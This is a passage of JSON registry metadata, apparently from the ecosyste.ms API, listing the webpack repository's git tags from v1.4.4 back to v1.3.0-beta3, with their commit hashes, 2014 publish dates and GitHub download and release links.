//codeload.github.com/webpack/webpack/tar.gz/v1.4.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"91c7426e4595f0d3c45efc9c1e17b40d875e6de2","kind":"commit","published_at":"2014-09-23T06:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3/manifests"},{"name":"v1.4.2","sha":"c117ec46eaa149d3732157744467e58b2baf4517","kind":"commit","published_at":"2014-09-22T21:51:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2/manifests"},{"name":"v1.4.1-beta1","sha":"c59727720e4bf1feb5a1939b69154ceec0111ed0","kind":"commit","published_at":"2014-09-19T06:13:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1/manifests"},{"name":"v1.4.0-beta10","sha":"4afdc81bc4fa95fad705957f335ab48c6f7feb9a","kind":"commit","published_at":"2014-09-17T21:25:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10/manifests"},{"name":"v1.4.0-beta9","sha":"4e79c9f245c3df0173cb75312cde5f1c51c902f6","kind":"commit","published_at":"2014-09-16T17:36:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9/manifests"},{"name":"v1.4.0-beta8","sha":"bd02534a588b4ddc2893b5d222836f7c8df8447e","kind":"commit","published_at":"2014-09-15T11:33:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8/manifests"},{"name":"v1.4.0-beta7","sha":"81748e167a80d79454f44564ca146179b9692e6d","kind":"commit","published_at":"2014-09-15T11:27:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7/manifests"},{"name":"v1.4.0-beta6","sha":"2eed5961b0433ed22fd0a8d825f7ff15fd0dbeb1","kind":"commit","published_at":"2014-09-11T18:22:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6/manifests"},{"name":"v1.4.0-beta5","sha":"911b62cfcb702a5971c67a6e2b4f100118bd26e2","kind":"commit","published_at":"2014-09-10T12:10:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5/manifests"},{"name":"v1.4.0-beta4","sha":"89db931fb0ab82a6a46bb7afa4ae57126d555090","kind":"commit","published_at":"2014-09-07T20:55:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4/manifests"},{"name":"v1.4.0-beta3","sha":"970e16d69b64df94b1d7f5dcf8e0f6c25cc2ff61","kind":"commit","published_at":"2014-09-03T12:16:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3/manifests"},{"name":"v1.4.0-beta2","sha":"a912045bd428f3970762a49457e1d5d95316f3c5","kind":"commit","published_at":"2014-08-29T14:08:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2/manifests"},{"name":"v1.4.0-beta1","sha":"b014b77d7f7de8d5b2f3d8aa0ca2bda1e948fc1d","kind":"commit","published_at":"2014-08-27T15:18:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1/manifests"},{"name":"v1.3.7","sha":"b9a84f89d40e618357c17430eb61f76ccf48bef2","kind":"commit","published_at":"2014-08-25T14:34:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7/manifests"},{"name":"v1.3.6","sha":"19b618133a121d2fad838e74b0879fa94dfeef3d","kind":"commit","published_at":"2014-08-25T11:38:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6/manifests"},{"name":"v1.3.5","sha":"382635d711081fb6fedb75719e4c7f0e1e40f766","kind":"commit","published_at":"2014-08-25T08:45:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5/manifests"},{"name":"v1.3.4","sha":"b9ac3fa3c77d64856503013a7262efd5b368a199","kind":"commit","published_at":"2014-08-25T08:20:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4/manifests"},{"name":"v1.3.3-beta2","sha":"2a419ccbeab05d91a9f14fa6ac1e2037678d8f29","kind":"commit","published_at":"2014-08-14T09:34:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2/manifests"},{"name":"v1.3.3-beta1","sha":"5a447ad7c39b63c037f56daf6df7d1df9074d1c8","kind":"commit","published_at":"2014-08-03T19:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1/manifests"},{"name":"v1.3.2-beta9","sha":"a7d7c4ca2fb245d22fa98944d32acfff4746ac44","kind":"commit","published_at":"2014-07-28T22:15:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9/manifests"},{"name":"v1.3.2-beta8","sha":"18ad6548134d5ff40fd04633e8e1375ddb005cc1","kind":"commit","published_at":"2014-07-26T15:54:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8/manifests"},{"name":"v1.3.2-beta7","sha":"0dd1a69b97161df01a6bdd41d5f32bb4135af50a","kind":"commit","published_at":"2014-07-26T12:48:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7/manifests"},{"name":"v1.3.2-beta6","sha":"7f6f44df1bb9ca055ac0eaed89aa0dca4e8dc6fa","kind":"commit","published_at":"2014-07-24T15:54:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6/manifests"},{"name":"v1.3.2-beta5","sha":"cca21ee10756dbb8edb6fb283391f304a197295f","kind":"commit","published_at":"2014-07-24T13:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5/manifests"},{"name":"v1.3.2-beta4","sha":"8d90c0f5b5998ebaf3e61ac443ec01a223d456e9","kind":"commit","published_at":"2014-07-23T12:42:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4/manifests"},{"name":"v1.3.2-beta3","sha":"d76600101ccc5aef0be148909a336baf3d2ccfce","kind":"commit","published_at":"2014-07-19T12:35:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3/manifests"},{"name":"v1.3.2-beta2","sha":"9d4cbb125445f4c2bb99c5b55a16c3255ae1d247","kind":"commit","published_at":"2014-07-18T11:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2/manifests"},{"name":"v1.3.2-beta1","sha":"0ab5a3e993386b54afab416b5bc02747658469e6","kind":"commit","published_at":"2014-07-17T00:06:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1/manifests"},{"name":"v1.3.1-beta9","sha":"53c38582e6ceb31aefab5237b042148dd6712151","kind":"commit","published_at":"2014-07-16T18:57:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9/manifests"},{"name":"v1.3.1-beta8","sha":"6c50e7c3883ac24c4f3dcd7b8a11f9545c230589","kind":"commit","published_at":"2014-07-09T11:37:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8/manifests"},{"name":"v1.3.1-beta7","sha":"287984cb54ed896c85778dc1874ec05195b99a11","kind":"commit","published_at":"2014-07-07T11:22:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7/manifests"},{"name":"v1.3.1-beta6","sha":"5113a81dd9cdbf35cb104e50480b4c858105b795","kind":"commit","published_at":"2014-07-04T11:02:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6/manifests"},{"name":"v1.3.1-beta5","sha":"197d2f2efa9e42836efe3f0f62c04c58b981a745","kind":"commit","published_at":"2014-07-02T22:00:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5/manifests"},{"name":"v1.3.1-beta4","sha":"68cc2c6e03d1326bc0c69cab5b1faf7145e1e195","kind":"commit","published_at":"2014-06-23T22:46:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4/manifests"},{"name":"v1.3.1-beta3","sha":"93beeacdf8e45970349006dc589c8e73b013e832","kind":"commit","published_at":"2014-06-18T21:03:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3/manifests"},{"name":"v1.3.1-beta2","sha":"af55e54271c5961e6d1bf57b485f5a5463bb5a7f","kind":"commit","published_at":"2014-06-18T09:12:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2/manifests"},{"name":"v1.3.1-beta1","sha":"8c2327e0b7863853a45ef094dbb8ded520e0314f","kind":"commit","published_at":"2014-06-17T20:46:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1/manifests"},{"name":"v1.3.0-beta9","sha":"419eb4dfd9d7ed8ad16688874e33bbe57617e2d8","kind":"commit","published_at":"2014-06-17T20:40:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9/manifests"},{"name":"v1.3.0-beta8","sha":"d3db09f72066ee23ec241f33ad6dfb00d42e8582","kind":"commit","published_at":"2014-06-12T04:31:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8/manifests"},{"name":"v1.3.0-beta7","sha":"46a918f5682ec766bc21424311f16fe28bcd8892","kind":"commit","published_at":"2014-06-11T20:52:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7/manifests"},{"name":"v1.3.0-beta6","sha":"20ad2baf9afd6a8d4e969e9ee094994c7b11905b","kind":"commit","published_at":"2014-06-11T20:26:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6/manifests"},{"name":"v1.3.0-beta5","sha":"8bfb752c526ef612b2011c7bc266b7adb7a8fcb7","kind":"commit","published_at":"2014-06-05T17:54:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5/manifests"},{"name":"v1.3.0-beta4","sha":"56e7073abbfec4b920bf1dffb0924027072d0c4e","kind":"commit","published_at":"2014-06-05T07:31:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4/manifests"},{"name":"v1.3.0-beta3","sha":"5cfd4138d682139af7069342aa66e0495070db9b","kind":"commit","published_at":"2014-06-04T06:48:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpac